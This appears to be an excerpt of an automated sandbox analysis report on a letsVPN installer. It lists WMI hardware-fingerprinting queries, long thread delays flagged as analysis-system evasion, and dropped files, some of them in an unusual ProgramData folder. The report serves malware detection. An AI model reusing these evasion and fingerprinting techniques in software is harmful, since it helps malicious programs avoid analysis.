              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer <> 'Microsoft'))
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = 'tap0901'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: FE0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2CB0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 1240000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 960000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 24D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 44D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 2420000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 24D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Memory allocated: 44D0000 memory reserve | memory write watch
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: memset,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,memcpy,GlobalFree,??3@YAXPAX@Z,19_2_005260A0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Code function: 33_2_00007FF7961920D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,33_2_00007FF7961920D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7553
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2099
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Window / User API: threadDelayed 5283
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Window / User API: threadDelayed 3558
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsDialogs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4F7.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsExec.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeAPI coverage: 0.1 %
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeAPI coverage: 6.4 %
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeAPI coverage: 7.6 %
              Source: C:\Windows\System32\svchost.exe TID: 4788Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 1708Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6648Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6644Thread sleep time: -4500000s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7752Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
